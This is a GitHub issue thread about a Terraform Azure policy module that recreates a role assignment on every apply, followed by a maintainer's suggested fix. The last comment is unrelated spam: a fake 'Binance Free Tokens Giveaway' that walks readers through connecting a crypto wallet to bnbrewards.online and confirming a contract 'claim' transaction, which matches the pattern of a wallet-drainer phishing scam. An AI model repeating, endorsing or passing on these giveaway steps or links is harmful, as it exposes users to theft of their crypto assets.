### ISSUE TITLE
set_assignment - every apply trigger azurerm_role_assignment.rem_role delete/create

### ISSUE THREAD

**Issue by judiethel** [gettek/terraform-azurerm-policy-as-code#96]
# Issue Template

## Prerequisites

- [x] I am running the latest version
- [x] I checked the documentation and found no answer
- [x] I checked to make sure that this issue has not already been filed

## Context

* Module Version: 2.8.3
* Terraform Version: [v1.6.3]

```hcl
module "configure_policy_data_assigment_to_sub" {
  for_each = toset(var.policy_data.assignment.scope_sub_ids)

  source                      = "gettek/policy-as-code/azurerm//modules/set_assignment"
  version                     = "2.8.3"
  initiative                  = module.configure_policy_data_initiative
  assignment_scope            = data.azurerm_subscription.initiative_assign_to_sub[each.key].id
  assignment_location         = var.policy_data.assignment.location
  assignment_enforcement_mode = true
  skip_role_assignment        = false
  skip_remediation            = false
  assignment_parameters       = local.parameter_list_for_assignment
}
```

I guess this is the code which causes the issue. This in from submodule of the initiative.
```hcl
  # get role definition IDs
  role_definition_ids = {
    for d in var.member_definitions :
    d.name => try(jsondecode(d.policy_rule).then.details.roleDefinitionIds, [])
  }

  # combine all discovered role definition IDs
  all_role_definition_ids = try(distinct([for v in flatten(values(local.role_definition_ids)) : lower(v)]), [])
```

## Expected Behavior
I expecte that the Azure initiative will be assigned to the given subscription. The assignment works fine as I can tell. 

## Current Behavior
I discovered, that each time I run a terraform plan/apply it will recreate the `azurerm_role_assignment.rem_role`. 
![image](https://github.com/gettek/terraform-azurerm-policy-as-code/assets/102523435/5dc125c7-3665-4103-8e22-f9bccaf95f8d)

Terraform detects a difference in the role_definition_id. Looks like some informations are missing in the 
```
"/subscriptions/aae7c2ce-523b-4715-b8ec-c4848196c981/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c"
```

Would it be possible to generate the correct ids?
```
"/providers/microsoft.authorization/roledefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c"
```

I also have tried to do this: https://registry.terraform.io/modules/gettek/policy-as-code/azurerm/2.2.0#error-invalid-for_each-argument

Not sure if this is a new issue of can be solved by myself. 

Thank you for taking a look into this one.

**Comment by gettek** [comment]
Hi @judiethel, try changing the assignment parameter to below:
`initiative = module.configure_policy_data_initiative.initiative`, appears you are missing the sub resource

**Comment by NiicoleLuna** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
